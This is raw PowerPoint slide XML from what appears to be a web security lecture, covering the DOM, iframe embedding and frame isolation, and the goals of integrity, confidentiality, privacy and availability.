        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="object 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F400CD55-1BF5-2E4F-91FE-9D3272ACE534}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8188907" y="5249204"/>
            <a:ext cx="81980" cy="105582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId9" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="object 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00DD9B15-6CF1-EB40-8CC4-01436A67240E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400632" y="5386113"/>
            <a:ext cx="2590799" cy="1367156"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId10" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Content Placeholder 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E88BD7A-A673-EF46-9DF2-51BA6E61989B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4655015"/>
            <a:ext cx="8686800" cy="2202985"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>DOM: Document Object Model             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a cross-platform model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>representing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and interacting with objects in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10527911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B7109-77BB-8B45-A6FB-108C6553940B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{824AA82C-1B35-0447-A2CB-2E1C5679DAEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8763000" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enable embedding a page within a page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-95" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-5" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"&gt;&lt;/iframe&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EE76F63-A0BF-DF47-BE77-CAFAA31500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00" y="2587244"/>
            <a:ext cx="7772400" cy="4067556"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{662CC9A9-DC31-6743-891F-BED9EE2E564C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="5868988"/>
            <a:ext cx="9144000" cy="1046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17" tIns="60958" rIns="121917" bIns="60958">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r">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-CN" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-CN" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-CN" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://elementor.com/blog/wireframe-website/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-CN" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BFFEB5E-1D08-F94A-9457-4AD15184EE67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3448050" y="2587244"/>
            <a:ext cx="2247900" cy="583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buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>outer page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90D2CD54-8803-E942-AED6-A78EEF865960}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="2587244"/>
            <a:ext cx="2247900" cy="583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buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>inner page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39084375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435EFD-5BDF-174D-A8E6-1E28175EC539}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC5111AE-94A0-934E-BFF9-75D685B2C36D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Outer page can specify only sizing and placement of the frame in the outer page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Frame isolation:                           Outer page cannot change contents of inner page, inner page cannot change contents of outer page</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12913892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D9E3-0BE3-5D4B-AF76-BB49ECBB408E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C519A7D9-3E9A-A648-B6F5-6221C7005EF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Modularity                                       bring together content from multiple sources;                                         aggregate on client side;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Delegation                                   frame can draw its own rectangle;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19049211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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9046772-9EEC-1B45-B28B-814087E34229}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2130425"/>
            <a:ext cx="9144000" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5400"/>
              <a:t>Web?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17410" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5250820A-33BA-CB42-AA5A-664720F6D7DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4572000"/>
            <a:ext cx="9220200" cy="2286000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Credit:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Some slides are borrowed from Prof. R. Popa and Prof. H. Xu.</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Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E5DB4FC-2855-DB42-9072-55BD7E0D1693}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="259080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4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web Security?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38192764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092352-2C80-BD49-90E4-5C8FFE992487}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Goals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB7F5553-3F15-C244-B41D-CC59C8AED23D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Integrity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Confidentiality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Privacy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Availability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0964B482-A57C-D94A-B7CB-7846748C2E14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="274638"/>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4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41703529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092352-2C80-BD49-90E4-5C8FFE992487}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Goals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB7F5553-3F15-C244-B41D-CC59C8AED23D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8839200" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" b="1" dirty="0"/>
              <a:t>Integrity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>                                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>malicious web sites should not be able to tamper with integrity of my computer or my information on other web sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Confidentiality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Privacy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Availability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0964B482-A57C-D94A-B7CB-7846748C2E14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="274638"/>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4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12648505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092352-2C80-BD49-90E4-5C8FFE992487}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
